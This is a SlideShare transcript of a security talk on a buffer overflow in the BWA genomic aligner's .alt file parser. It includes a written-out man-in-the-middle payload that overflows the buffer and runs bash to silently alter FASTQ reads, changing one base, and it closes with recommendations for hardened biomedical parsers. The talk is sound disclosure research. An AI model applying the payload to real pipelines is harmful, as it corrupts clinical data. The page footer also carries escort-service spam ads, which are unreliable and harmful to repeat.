SlideShare una empresa de Scribd logo
1 de 46
From Buffer-Overflowing Genomic
Tools to Securing Biomedical File
Formats
Corey M. Hudson
Charles Fracchia
Corey’s Funding
Supported by the Laboratory Directed Research and
Development program at Sandia National Laboratories, a
multi-mission laboratory managed and operated by National
Technology and Engineering Solutions of Sandia, LLC, a
wholly owned subsidiary of Honeywell International, Inc., for
the U.S. Department of Energy’s National Nuclear Security
Administration under contract DE-NA0003525.
What is a Genome’s value? NHGRI Data (2019)
Illumina (2018)
NHGRI Estimate (2011)
$1,000
Growth Drivers:
Healthcare and Genomics
Athreya et al., 2019
Growth Drivers:
Industry, SynBio & Genomics
What issues has this growth created?
BROAD Institute Best-Practices Pipeline
ARPANET (1971)
Change in trust model
Need for standardization
& automation
Bio is turning Digital
ObservationSubject
Selection
Analysis
manual manual manual
Bio is turning Digital
automated automated automated
ObservationSubject
Selection
Analysis
The Bio-Digital “Stack”
Design Build Test
Analyze
digital input
output
The Bio-Digital “Stack”
Design Build Test
Analyze
digital input
output
Critical Workflows rely on digital tools
Critical Workflows rely on digital tools
Then?
Where do these tools come from?
Academia
Business
Where do these tools come from?
Academia
Business
.NET Bio
AMPHORA
Anduril
Ascalaph
Designer
AutoDock
Avogadro
Bioclipse
Bioconductor
BioJava
BioJS
BioMOBY
BioPerl
https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software
BioPHP
Biopython
BioRuby
CP2K
EMBOSS
Galaxy
GenePattern
Geworkbench
GMOD
GenGIS
Genomespace
GENtle
GROMACS
IntGenomeBrows
InterMine
LabKey Server
LAMMPS
mothur
PathVisio
Orange
Staden Package
Taverna
workbench
UGENE
Unipept
VOTCA
Just alignment software!
Academia
Business
BLAST
CS-BLAST
CUDASW++
DIAMOND
FASTA
GGSEARCH, GLSEARCH
Genoogle
HMMER
HH-suite
IDF
Infernal
KLAST
LAMBDA
MMseqs2
USEARCH
OSWALD
parasail
PSI-BLAST
PSI-Search
ScalaBLAST
Sequilab
SAM
SSEARCH
SWAPHI
SWAPHI-LS
SWIMM
SWIPE
ACANA
AlignMe
ALLALIGN
Bioconductor
BioPerl dpAlign
BLASTZ, LASTZ
CUDAlign
DNADot
DNASTAR
DOTLET
FEAST
Genome Compiler
G-PAS
GapMis
GGSEARCH, GLSEARCH
JAligner
K*Sync
LALIGN
NW-align
mAlign
matcher
MCALIGN2
MUMmer
needle
Ngila
NW
parasail
Path
PatternHunter
https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software
ProbA
PyMOL
REPuter
SABERTOOTH
Satsuma
SEQALN
SIM, GAP, NAP, LAP
SIM
SPA: Super pairwise alignment
SSEARCH
Sequences Studio
SWIFT suit
stretcher
tranalign
UGENE
water
wordmatch
YASS
ABA
ALE
ALLALIGN
AMAP
BAli-Phy
Base-By-Base
CHAOS, DIALIGN
ClustalW
CodonCode Aligner
Compass
DECIPHER
DIALIGN-TX
DNA Alignment
DNA
DNADynamo
DNASTAR
EDNA
FAMSA
FSA
Geneious
Kalign
MAFFT
MARNA
MAVID
MSA
MSAProbs
MULTALIN
Multi-LAGAN
MUSCLE
Opal
Pecan
Phylo
PMFastR
Praline
PicXAA
POA
Probalign
ProbCons
PROMALS3D
PRRN/PRRP
PSAlign
RevTrans
SAGA
SAM
Se-Al
StatAlign
Stemloc
T-Coffee
UGENE
VectorFriends
GLProbs
ACT
AVID
BLAT
DECIPHER
FLAK
GMAP
Splign
Mauve
MGA
Mulan
Multiz
PLAST-ncRNA
Sequerome
Sequilab
Shuffle-LAGAN
SIBsim4, Sim4
SLAM
PMS
FMM
BLOCKS
eMOTIF
Gibbs motif sampler
HMMTOP
I-sites
JCoils
MEME/MAST
CUDA-MEME
MERCI
PHI-Blast
Phyloscan
PRATT
ScanProsite
TEIRESIAS
BASALT
Arioc
BarraCUDA
BBMap
BFAST
BigBWA
BLASTN
BLAT
Bowtie
BWA
BWA-PSSM
CASHX
Cloudburst
CUDA-EC
CUSHAW
CUSHAW2
CUSHAW2-GPU
CUSHAW3
drFAST
ELAND
ERNE
GASSST
GEM
Genalice MAP
Geneious Assembler
GensearchNGS
GMAP
GNUMAP
HIVE-hexagon
IMOS
LAST
MAQ
mrFAST
MOM
MOSAIK
MPscan
Novoalign
NextGENe
NextGenMap
Omixon Variant Toolkit
PALMapper
Partek Flow
PASS
PerM
PRIMEX
QPalma
RazerS
REAL
RMAP
rNA
RTG Investigator
Segemehl
SeqMap
Shrec
SHRiMP
SLIDER
SOAP
SOCS
SparkBWA
SSAHA, SSAHA2
Stampy
SToRM
Taipan
UGENE
VelociMapper
XpressAlign
ZOOM
Where do these tools come from?
Academia
Business
Instrument Software
Electronic Lab Notebooks
SpotFire
Geneious
FlowJo
PEAKS
IPA
LaserGene
Geneious
SnapGene
Gene Construction Kit
Sequencher
CodonCode Aligner
Ingenuity Pathway Analysis
GeneSpring
JMP Genomics
Genevestigator
GeneMarker
PeakScanner
GenomeStudio
Analyst
Metamorph
Volocity
Avizo
MicroView
FCS Express
Just alignment software!
Academia
Business
BLAST
CS-BLAST
CUDASW++
DIAMOND
FASTA
GGSEARCH, GLSEARCH
Genoogle
HMMER
HH-suite
IDF
Infernal
KLAST
LAMBDA
MMseqs2
USEARCH
OSWALD
parasail
PSI-BLAST
PSI-Search
ScalaBLAST
Sequilab
SAM
SSEARCH
SWAPHI
SWAPHI-LS
SWIMM
SWIPE
ACANA
AlignMe
ALLALIGN
Bioconductor
BioPerl dpAlign
BLASTZ, LASTZ
CUDAlign
DNADot
DNASTAR
DOTLET
FEAST
Genome Compiler
G-PAS
GapMis
GGSEARCH, GLSEARCH
JAligner
K*Sync
LALIGN
NW-align
mAlign
matcher
MCALIGN2
MUMmer
needle
Ngila
NW
parasail
Path
PatternHunter
https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software
ProbA
PyMOL
REPuter
SABERTOOTH
Satsuma
SEQALN
SIM, GAP, NAP, LAP
SIM
SPA: Super pairwise alignment
SSEARCH
Sequences Studio
SWIFT suit
stretcher
tranalign
UGENE
water
wordmatch
YASS
ABA
ALE
ALLALIGN
AMAP
BAli-Phy
Base-By-Base
CHAOS, DIALIGN
ClustalW
CodonCode Aligner
Compass
DECIPHER
DIALIGN-TX
DNA Alignment
DNA
DNADynamo
DNASTAR
EDNA
FAMSA
FSA
Geneious
Kalign
MAFFT
MARNA
MAVID
MSA
MSAProbs
MULTALIN
Multi-LAGAN
MUSCLE
Opal
Pecan
Phylo
PMFastR
Praline
PicXAA
POA
Probalign
ProbCons
PROMALS3D
PRRN/PRRP
PSAlign
RevTrans
SAGA
SAM
Se-Al
StatAlign
Stemloc
T-Coffee
UGENE
VectorFriends
GLProbs
ACT
AVID
BLAT
DECIPHER
FLAK
GMAP
Splign
Mauve
MGA
Mulan
Multiz
PLAST-ncRNA
Sequerome
Sequilab
Shuffle-LAGAN
SIBsim4, Sim4
SLAM
PMS
FMM
BLOCKS
eMOTIF
Gibbs motif sampler
HMMTOP
I-sites
JCoils
MEME/MAST
CUDA-MEME
MERCI
PHI-Blast
Phyloscan
PRATT
ScanProsite
TEIRESIAS
BASALT
Arioc
BarraCUDA
BBMap
BFAST
BigBWA
BLASTN
BLAT
Bowtie
BWABWA-PSSM
CASHX
Cloudburst
CUDA-EC
CUSHAW
CUSHAW2
CUSHAW2-GPU
CUSHAW3
drFAST
ELAND
ERNE
GASSST
GEM
Genalice MAP
Geneious Assembler
GensearchNGS
GMAP
GNUMAP
HIVE-hexagon
IMOS
LAST
MAQ
mrFAST
MOM
MOSAIK
MPscan
Novoalign
NextGENe
NextGenMap
Omixon Variant Toolkit
PALMapper
Partek Flow
PASS
PerM
PRIMEX
QPalma
RazerS
REAL
RMAP
rNA
RTG Investigator
Segemehl
SeqMap
Shrec
SHRiMP
SLIDER
SOAP
SOCS
SparkBWA
SSAHA, SSAHA2
Stampy
SToRM
Taipan
UGENE
VelociMapper
XpressAlign
ZOOM
Genomics Data: A Primer
Data Flows
Data Pipelines
Hacking the Raw Data
to Change a Clinical Outcome
Software Pipeline
First tool in the pipeline - BWA
1. BWA takes FASTQ files as input and maps these to a reference genome, creating a SAM file
2. In 2014, BWA developers added the ALT-aware capacity – which allowed users to map reads
to a population, rather than canonical single reference
3. Since the population is always changing and requires up-to-date knowledge, the reference is
hosted at a central repository
4. BWA provides a tool – bwa.kit, which accesses this data from the US National Center for
Biotechnology Information (NCBI), which has provided resources for the storage and delivery
of these files as a tarred and gzipped directory of indices:
ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/000/001/405/GCA_000001405.15_GRCh38/seqs_f
or_alignment_pipelines.ucsc_ids/
5. The user then unzips and stores the indices provided by NCBI
6. A .alt file is used to index the genome and make it alt-aware
BWA and the Outside World
A Native BWA Vulnerability
If a .alt file has a line >1024 bytes
it will overflow here
1024 byte buffer
Overflowing the buffer
Database indices are delivered
unencrypted over FTP
FTP Protocol
{No Checksums
Modeling the delivery
Crafting an exploit
After the data are mapped – turn a single A at a
particular position in the genome into a C.
Limits
No other data in the genome can be harmed
(can’t turn all A’s to C’s)
Must change raw data (make it invisible in follow-
on analysis)
How to target the position – PCR trick
Running Polymerase Chain Reaction (PCR) requires primers
If you wish to find a particular nucleotide in the genome, you need
primers up and downstream of the nucleotide of interest
Chose A at position 64,544,989 on chromosome 12
Random choice (not clinically meaningful)
7 base pairs upstream and 9 base pairs downstream are sufficient to
be nearly unique
Full exploit delivered with over MitM
python -c "print '@' + 'A'*1500 + 'B'*1500 + 'C'*1500 + 'D'*419 +
'/bin/bash -c “sed -i
s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g *.fq”’ ;
mv .hiddenAltOrig
"GCA_000001405.15_GRCh38_full_analysis_set.fna.alt";
cat ~/.bash_history | grep "bwa mem" | tail -n 1 | /bin/bash >
GCA_000001405.15_GRCh38_full_analysis_set.fna.alt
Exploit only runs once, but changes all .fq files
Aftermath – Finish analysis
Three experiments
Setup: 3 sets of simulated reads in data directory
– finalizing as simulated_reads{A,B,C}.vcf
1. Unpatched – no exploit
2. Unpatched – Payload: sed -i
s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g
3. Patched – Payload
Output of no exploit
Reference: Genotype AA at chromosome 12 position
64544989, position 64544989 absent from variants or A
Output of PayloadA – AC one-direction
Reference: Genotype AA at chromosome 12
position 64544989 – output Genotype AC
Probability that Genotype is AC vs random: P<2200.6, P<2121.6, P<2117.6
Output of patched file
The Bio-Digital “Stack”
Design Build Test
Analyze
digital input
output
Instrument List (excerpt)
Sequencer
Mass Spectrometer
Chromatographer
Blood Gas Analyzer
Bioreactor
Filtration Machine
Cell Counter
Syringe Pumps
Centrifuges
Incubators
Electrophoresis
Gel Imagers
Microarray
Blood Culture
Robotic Liquid Handlers
Electroporators
Microscopes
Scales
Freezers / Fridges
Flow Cytometers
Digital Pathology
High Content Imagers
Thermocyclers
Instrument List (excerpt)
Sequencer
Mass Spectrometer
Chromatographer
Blood Gas Analyzer
Bioreactor
Filtration Machine
Cell Counter
Syringe Pumps
Centrifuges
Incubators
Electrophoresis
Gel Imagers
Microarray
Blood Culture
Robotic Liquid Handlers
Electroporators
Microscopes
Scales
Freezers / Fridges
Flow Cytometers
Digital Pathology
High Content Imagers
Thermocyclers
digital input
Instrument List (excerpt)
Sequencer
Mass Spectrometer
Chromatographer
Blood Gas Analyzer
Bioreactor
Filtration Machine
Cell Counter
Syringe Pumps
Centrifuges
Incubators
Electrophoresis
Gel Imagers
Microarray
Blood Culture
Robotic Liquid Handlers
Electroporators
Microscopes
Scales
Freezers / Fridges
Flow Cytometers
Digital Pathology
High Content Imagers
Thermocyclers
digital output
The Bio-Digital “Stack”
Design Build Test
Analyze
digital input
output
firmware &
OS
software &
file formats
firmware &
OS
software &
file formats
Vulnerability Landscape
software
buffer overflows, file corruption, etc
firmware
file formats
OS
privilege escalation, remote code execution
biological DoS, financial attack
…
Vulnerability Landscape
OS
Windows XP
HAS to be connected
& using SMBv1
Vulnerability Landscape
OS
Windows XP
HAS to be connected
& using SMBv1
A unique constraint of CyberBioSec
Scientist vs IT
What needs to happen, starting now
1. Hardened parsers for common formats
2. Bug bounties for key software
3. Instrument manufacturers should
publish file format specs & parser code
Asks
Wanna fund bug bounties? Come talk to us
Instrument Vendors, come talk to us
Send us sample files!
https://bit.ly/2yxzy8I
From Buffer-Overflowing Genomic
Tools to Securing Biomedical File
Formats
Corey M. Hudson
Charles Fracchia

Más contenido relacionado

Similar a From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats

User-friendly bioinformatics (Monthly Informational workshop)
User-friendly bioinformatics (Monthly Informational workshop)User-friendly bioinformatics (Monthly Informational workshop)
User-friendly bioinformatics (Monthly Informational workshop)Elia Brodsky
 
Software Pipelines: The Good, The Bad and The Ugly
Software Pipelines: The Good, The Bad and The UglySoftware Pipelines: The Good, The Bad and The Ugly
Software Pipelines: The Good, The Bad and The UglyJoão André Carriço
 
AI-SDV 2022: Big data analytics platform at Bayer – Turning bits into insight...
AI-SDV 2022: Big data analytics platform at Bayer – Turning bits into insight...AI-SDV 2022: Big data analytics platform at Bayer – Turning bits into insight...
AI-SDV 2022: Big data analytics platform at Bayer – Turning bits into insight...Dr. Haxel Consult
 
Normal/Tumor somatic mutations report tool
Normal/Tumor somatic mutations report toolNormal/Tumor somatic mutations report tool
Normal/Tumor somatic mutations report toolIsaac Noguera
 
Tag.bio aws public jun 08 2021
Tag.bio aws public jun 08 2021 Tag.bio aws public jun 08 2021
Tag.bio aws public jun 08 2021 Sanjay Padhi, Ph.D
 
iMicrobe and iVirus: Extending the iPlant cyberinfrastructure from plants to ...
iMicrobe and iVirus: Extending the iPlant cyberinfrastructure from plants to ...iMicrobe and iVirus: Extending the iPlant cyberinfrastructure from plants to ...
iMicrobe and iVirus: Extending the iPlant cyberinfrastructure from plants to ...Bonnie Hurwitz
 
Analytics of analytics pipelines: from optimising re-execution to general Dat...
Analytics of analytics pipelines:from optimising re-execution to general Dat...Analytics of analytics pipelines:from optimising re-execution to general Dat...
Analytics of analytics pipelines: from optimising re-execution to general Dat...Paolo Missier
 
Bio-IT 2017 - Session 7: Next-Gen Sequencing Informatics
Bio-IT 2017 - Session 7: Next-Gen Sequencing InformaticsBio-IT 2017 - Session 7: Next-Gen Sequencing Informatics
Bio-IT 2017 - Session 7: Next-Gen Sequencing InformaticsYaoyu Wang
 
Making Use of NGS Data: From Reads to Trees and Annotations
Making Use of NGS Data: From Reads to Trees and AnnotationsMaking Use of NGS Data: From Reads to Trees and Annotations
Making Use of NGS Data: From Reads to Trees and AnnotationsJoão André Carriço
 
tranSMART Community Meeting 5-7 Nov 13 - Session 3: Pfizer’s Recent Use of tr...
tranSMART Community Meeting 5-7 Nov 13 - Session 3: Pfizer’s Recent Use of tr...tranSMART Community Meeting 5-7 Nov 13 - Session 3: Pfizer’s Recent Use of tr...
tranSMART Community Meeting 5-7 Nov 13 - Session 3: Pfizer’s Recent Use of tr...David Peyruc
 
Grid Projects In The US July 2008
Grid Projects In The US July 2008Grid Projects In The US July 2008
Grid Projects In The US July 2008Ian Foster
 
Jesse Xiao at CODATA2017: Updates to the GigaDB open access data publishing p...
Jesse Xiao at CODATA2017: Updates to the GigaDB open access data publishing p...Jesse Xiao at CODATA2017: Updates to the GigaDB open access data publishing p...
Jesse Xiao at CODATA2017: Updates to the GigaDB open access data publishing p...GigaScience, BGI Hong Kong
 
Scalable and Repeatable Machine Learning pipelines: A key requirement for you...
Scalable and Repeatable Machine Learning pipelines: A key requirement for you...Scalable and Repeatable Machine Learning pipelines: A key requirement for you...
Scalable and Repeatable Machine Learning pipelines: A key requirement for you...All Things Open
 
Computational Resources In Infectious Disease
Computational Resources In Infectious DiseaseComputational Resources In Infectious Disease
Computational Resources In Infectious DiseaseJoão André Carriço
 
Cloud e-Genome: NGS Workflows on the Cloud Using e-Science Central
Cloud e-Genome: NGS Workflows on the Cloud Using e-Science CentralCloud e-Genome: NGS Workflows on the Cloud Using e-Science Central
Cloud e-Genome: NGS Workflows on the Cloud Using e-Science CentralPaolo Missier
 
20120907 microbiome-intro
20120907 microbiome-intro20120907 microbiome-intro
20120907 microbiome-introLeo Lahti
 
Best Practices for Validating a Next-Gen Sequencing Workflow
Best Practices for Validating a Next-Gen Sequencing WorkflowBest Practices for Validating a Next-Gen Sequencing Workflow
Best Practices for Validating a Next-Gen Sequencing WorkflowGolden Helix
 

Similar a From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats (20)

User-friendly bioinformatics (Monthly Informational workshop)
User-friendly bioinformatics (Monthly Informational workshop)User-friendly bioinformatics (Monthly Informational workshop)
User-friendly bioinformatics (Monthly Informational workshop)
 
Software Pipelines: The Good, The Bad and The Ugly
Software Pipelines: The Good, The Bad and The UglySoftware Pipelines: The Good, The Bad and The Ugly
Software Pipelines: The Good, The Bad and The Ugly
 
Overview of Next Gen Sequencing Data Analysis
Overview of Next Gen Sequencing Data AnalysisOverview of Next Gen Sequencing Data Analysis
Overview of Next Gen Sequencing Data Analysis
 
AI-SDV 2022: Big data analytics platform at Bayer – Turning bits into insight...
AI-SDV 2022: Big data analytics platform at Bayer – Turning bits into insight...AI-SDV 2022: Big data analytics platform at Bayer – Turning bits into insight...
AI-SDV 2022: Big data analytics platform at Bayer – Turning bits into insight...
 
Normal/Tumor somatic mutations report tool
Normal/Tumor somatic mutations report toolNormal/Tumor somatic mutations report tool
Normal/Tumor somatic mutations report tool
 
Tag.bio aws public jun 08 2021
Tag.bio aws public jun 08 2021 Tag.bio aws public jun 08 2021
Tag.bio aws public jun 08 2021
 
iMicrobe and iVirus: Extending the iPlant cyberinfrastructure from plants to ...
iMicrobe and iVirus: Extending the iPlant cyberinfrastructure from plants to ...iMicrobe and iVirus: Extending the iPlant cyberinfrastructure from plants to ...
iMicrobe and iVirus: Extending the iPlant cyberinfrastructure from plants to ...
 
Analytics of analytics pipelines: from optimising re-execution to general Dat...
Analytics of analytics pipelines:from optimising re-execution to general Dat...Analytics of analytics pipelines:from optimising re-execution to general Dat...
Analytics of analytics pipelines: from optimising re-execution to general Dat...
 
Bio-IT 2017 - Session 7: Next-Gen Sequencing Informatics
Bio-IT 2017 - Session 7: Next-Gen Sequencing InformaticsBio-IT 2017 - Session 7: Next-Gen Sequencing Informatics
Bio-IT 2017 - Session 7: Next-Gen Sequencing Informatics
 
Making Use of NGS Data: From Reads to Trees and Annotations
Making Use of NGS Data: From Reads to Trees and AnnotationsMaking Use of NGS Data: From Reads to Trees and Annotations
Making Use of NGS Data: From Reads to Trees and Annotations
 
C4Bio paper talk
C4Bio paper talkC4Bio paper talk
C4Bio paper talk
 
tranSMART Community Meeting 5-7 Nov 13 - Session 3: Pfizer’s Recent Use of tr...
tranSMART Community Meeting 5-7 Nov 13 - Session 3: Pfizer’s Recent Use of tr...tranSMART Community Meeting 5-7 Nov 13 - Session 3: Pfizer’s Recent Use of tr...
tranSMART Community Meeting 5-7 Nov 13 - Session 3: Pfizer’s Recent Use of tr...
 
Grid Projects In The US July 2008
Grid Projects In The US July 2008Grid Projects In The US July 2008
Grid Projects In The US July 2008
 
Jesse Xiao at CODATA2017: Updates to the GigaDB open access data publishing p...
Jesse Xiao at CODATA2017: Updates to the GigaDB open access data publishing p...Jesse Xiao at CODATA2017: Updates to the GigaDB open access data publishing p...
Jesse Xiao at CODATA2017: Updates to the GigaDB open access data publishing p...
 
Scalable and Repeatable Machine Learning pipelines: A key requirement for you...
Scalable and Repeatable Machine Learning pipelines: A key requirement for you...Scalable and Repeatable Machine Learning pipelines: A key requirement for you...
Scalable and Repeatable Machine Learning pipelines: A key requirement for you...
 
Computational Resources In Infectious Disease
Computational Resources In Infectious DiseaseComputational Resources In Infectious Disease
Computational Resources In Infectious Disease
 
Cloud e-Genome: NGS Workflows on the Cloud Using e-Science Central
Cloud e-Genome: NGS Workflows on the Cloud Using e-Science CentralCloud e-Genome: NGS Workflows on the Cloud Using e-Science Central
Cloud e-Genome: NGS Workflows on the Cloud Using e-Science Central
 
Open64 compiler
Open64 compilerOpen64 compiler
Open64 compiler
 
20120907 microbiome-intro
20120907 microbiome-intro20120907 microbiome-intro
20120907 microbiome-intro
 
Best Practices for Validating a Next-Gen Sequencing Workflow
Best Practices for Validating a Next-Gen Sequencing WorkflowBest Practices for Validating a Next-Gen Sequencing Workflow
Best Practices for Validating a Next-Gen Sequencing Workflow
 

Último

Call Girl in Bangalore 9632137771 {LowPrice} ❤️ (Navya) Bangalore Call Girls ...
Call Girl in Bangalore 9632137771 {LowPrice} ❤️ (Navya) Bangalore Call Girls ...Call Girl in Bangalore 9632137771 {LowPrice} ❤️ (Navya) Bangalore Call Girls ...
Call Girl in Bangalore 9632137771 {LowPrice} ❤️ (Navya) Bangalore Call Girls ...mahaiklolahd
 
Kochi call girls Mallu escort girls available 7877702510
Kochi call girls Mallu escort girls available 7877702510Kochi call girls Mallu escort girls available 7877702510
Kochi call girls Mallu escort girls available 7877702510Vipesco
 
(Deeksha) 💓 9920725232 💓High Profile Call Girls Navi Mumbai You Can Get The S...
(Deeksha) 💓 9920725232 💓High Profile Call Girls Navi Mumbai You Can Get The S...(Deeksha) 💓 9920725232 💓High Profile Call Girls Navi Mumbai You Can Get The S...
(Deeksha) 💓 9920725232 💓High Profile Call Girls Navi Mumbai You Can Get The S...Ahmedabad Call Girls
 
Top 20 Famous Indian Female Pornstars Name List 2024
Top 20 Famous Indian Female Pornstars Name List 2024Top 20 Famous Indian Female Pornstars Name List 2024
Top 20 Famous Indian Female Pornstars Name List 2024Sheetaleventcompany
 
Sexy Call Girl Nagercoil Arshi 💚9058824046💚 Nagercoil Escort Service
Sexy Call Girl Nagercoil Arshi 💚9058824046💚 Nagercoil Escort ServiceSexy Call Girl Nagercoil Arshi 💚9058824046💚 Nagercoil Escort Service
Sexy Call Girl Nagercoil Arshi 💚9058824046💚 Nagercoil Escort Servicejaanseema653
 
Premium Call Girls Bangalore {7304373326} ❤️VVIP POOJA Call Girls in Bangalor...
Premium Call Girls Bangalore {7304373326} ❤️VVIP POOJA Call Girls in Bangalor...Premium Call Girls Bangalore {7304373326} ❤️VVIP POOJA Call Girls in Bangalor...
Premium Call Girls Bangalore {7304373326} ❤️VVIP POOJA Call Girls in Bangalor...Sheetaleventcompany
 
AECS Layout Escorts (Bangalore) 9352852248 Women seeking Men Real Service
AECS Layout Escorts (Bangalore) 9352852248 Women seeking Men Real ServiceAECS Layout Escorts (Bangalore) 9352852248 Women seeking Men Real Service
AECS Layout Escorts (Bangalore) 9352852248 Women seeking Men Real ServiceAhmedabad Call Girls
 
Sexy Call Girl Palani Arshi 💚9058824046💚 Palani Escort Service
Sexy Call Girl Palani Arshi 💚9058824046💚 Palani Escort ServiceSexy Call Girl Palani Arshi 💚9058824046💚 Palani Escort Service
Sexy Call Girl Palani Arshi 💚9058824046💚 Palani Escort Servicejaanseema653
 
visakhapatnam Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real Meet
visakhapatnam Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real Meetvisakhapatnam Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real Meet
visakhapatnam Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real MeetCall Girls Chandigarh
 
Call Girls Service Mohali {7435815124} ❤️VVIP PALAK Call Girl in Mohali Punjab
Call Girls Service Mohali {7435815124} ❤️VVIP PALAK Call Girl in Mohali PunjabCall Girls Service Mohali {7435815124} ❤️VVIP PALAK Call Girl in Mohali Punjab
Call Girls Service Mohali {7435815124} ❤️VVIP PALAK Call Girl in Mohali PunjabSheetaleventcompany
 
Call Now ☎ 8868886958 || Call Girls in Chandigarh Escort Service Chandigarh
Call Now ☎ 8868886958 || Call Girls in Chandigarh Escort Service ChandigarhCall Now ☎ 8868886958 || Call Girls in Chandigarh Escort Service Chandigarh
Call Now ☎ 8868886958 || Call Girls in Chandigarh Escort Service ChandigarhSheetaleventcompany
 
vadodara Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real Meet
vadodara Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real Meetvadodara Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real Meet
vadodara Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real MeetCall Girls Chandigarh
 
Escorts Service Ahmedabad🌹6367187148 🌹 No Need For Advance Payments
Escorts Service Ahmedabad🌹6367187148 🌹 No Need For Advance PaymentsEscorts Service Ahmedabad🌹6367187148 🌹 No Need For Advance Payments
Escorts Service Ahmedabad🌹6367187148 🌹 No Need For Advance PaymentsAhmedabad Call Girls
 
Jaipur Call Girls 9257276172 Call Girl in Jaipur Rajasthan
Jaipur Call Girls 9257276172 Call Girl in Jaipur RajasthanJaipur Call Girls 9257276172 Call Girl in Jaipur Rajasthan
Jaipur Call Girls 9257276172 Call Girl in Jaipur Rajasthanindiancallgirl4rent
 
Indore Call Girl Service 📞9235973566📞Just Call Inaaya📲 Call Girls In Indore N...
Indore Call Girl Service 📞9235973566📞Just Call Inaaya📲 Call Girls In Indore N...Indore Call Girl Service 📞9235973566📞Just Call Inaaya📲 Call Girls In Indore N...
Indore Call Girl Service 📞9235973566📞Just Call Inaaya📲 Call Girls In Indore N...Sheetaleventcompany
 
Low Rate Call Girls Pune {9xx000xx09} ❤️VVIP NISHA Call Girls in Pune Maharas...
Low Rate Call Girls Pune {9xx000xx09} ❤️VVIP NISHA Call Girls in Pune Maharas...Low Rate Call Girls Pune {9xx000xx09} ❤️VVIP NISHA Call Girls in Pune Maharas...
Low Rate Call Girls Pune {9xx000xx09} ❤️VVIP NISHA Call Girls in Pune Maharas...Sheetaleventcompany
 
9316020077📞Majorda Beach Call Girls Numbers, Call Girls Whatsapp Numbers Ma...
9316020077📞Majorda Beach Call Girls  Numbers, Call Girls  Whatsapp Numbers Ma...9316020077📞Majorda Beach Call Girls  Numbers, Call Girls  Whatsapp Numbers Ma...
9316020077📞Majorda Beach Call Girls Numbers, Call Girls Whatsapp Numbers Ma...Goa cutee sexy top girl
 
👉Bangalore Call Girl Service👉📞 7304373326 👉📞 Just📲 Call Rajveer Call Girls Se...
👉Bangalore Call Girl Service👉📞 7304373326 👉📞 Just📲 Call Rajveer Call Girls Se...👉Bangalore Call Girl Service👉📞 7304373326 👉📞 Just📲 Call Rajveer Call Girls Se...
👉Bangalore Call Girl Service👉📞 7304373326 👉📞 Just📲 Call Rajveer Call Girls Se...Sheetaleventcompany
 
Gorgeous Call Girls In Pune {9xx000xx09} ❤️VVIP ANKITA Call Girl in Pune Maha...
Gorgeous Call Girls In Pune {9xx000xx09} ❤️VVIP ANKITA Call Girl in Pune Maha...Gorgeous Call Girls In Pune {9xx000xx09} ❤️VVIP ANKITA Call Girl in Pune Maha...
Gorgeous Call Girls In Pune {9xx000xx09} ❤️VVIP ANKITA Call Girl in Pune Maha...Sheetaleventcompany
 
Sexy Call Girl Tiruvannamalai Arshi 💚9058824046💚 Tiruvannamalai Escort Service
Sexy Call Girl Tiruvannamalai Arshi 💚9058824046💚 Tiruvannamalai Escort ServiceSexy Call Girl Tiruvannamalai Arshi 💚9058824046💚 Tiruvannamalai Escort Service
Sexy Call Girl Tiruvannamalai Arshi 💚9058824046💚 Tiruvannamalai Escort Servicejaanseema653
 

Último (20)

Call Girl in Bangalore 9632137771 {LowPrice} ❤️ (Navya) Bangalore Call Girls ...
Call Girl in Bangalore 9632137771 {LowPrice} ❤️ (Navya) Bangalore Call Girls ...Call Girl in Bangalore 9632137771 {LowPrice} ❤️ (Navya) Bangalore Call Girls ...
Call Girl in Bangalore 9632137771 {LowPrice} ❤️ (Navya) Bangalore Call Girls ...
 
Kochi call girls Mallu escort girls available 7877702510
Kochi call girls Mallu escort girls available 7877702510Kochi call girls Mallu escort girls available 7877702510
Kochi call girls Mallu escort girls available 7877702510
 
(Deeksha) 💓 9920725232 💓High Profile Call Girls Navi Mumbai You Can Get The S...
(Deeksha) 💓 9920725232 💓High Profile Call Girls Navi Mumbai You Can Get The S...(Deeksha) 💓 9920725232 💓High Profile Call Girls Navi Mumbai You Can Get The S...
(Deeksha) 💓 9920725232 💓High Profile Call Girls Navi Mumbai You Can Get The S...
 
Top 20 Famous Indian Female Pornstars Name List 2024
Top 20 Famous Indian Female Pornstars Name List 2024Top 20 Famous Indian Female Pornstars Name List 2024
Top 20 Famous Indian Female Pornstars Name List 2024
 
Sexy Call Girl Nagercoil Arshi 💚9058824046💚 Nagercoil Escort Service
Sexy Call Girl Nagercoil Arshi 💚9058824046💚 Nagercoil Escort ServiceSexy Call Girl Nagercoil Arshi 💚9058824046💚 Nagercoil Escort Service
Sexy Call Girl Nagercoil Arshi 💚9058824046💚 Nagercoil Escort Service
 
Premium Call Girls Bangalore {7304373326} ❤️VVIP POOJA Call Girls in Bangalor...
Premium Call Girls Bangalore {7304373326} ❤️VVIP POOJA Call Girls in Bangalor...Premium Call Girls Bangalore {7304373326} ❤️VVIP POOJA Call Girls in Bangalor...
Premium Call Girls Bangalore {7304373326} ❤️VVIP POOJA Call Girls in Bangalor...
 
AECS Layout Escorts (Bangalore) 9352852248 Women seeking Men Real Service
AECS Layout Escorts (Bangalore) 9352852248 Women seeking Men Real ServiceAECS Layout Escorts (Bangalore) 9352852248 Women seeking Men Real Service
AECS Layout Escorts (Bangalore) 9352852248 Women seeking Men Real Service
 
Sexy Call Girl Palani Arshi 💚9058824046💚 Palani Escort Service
Sexy Call Girl Palani Arshi 💚9058824046💚 Palani Escort ServiceSexy Call Girl Palani Arshi 💚9058824046💚 Palani Escort Service
Sexy Call Girl Palani Arshi 💚9058824046💚 Palani Escort Service
 
visakhapatnam Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real Meet
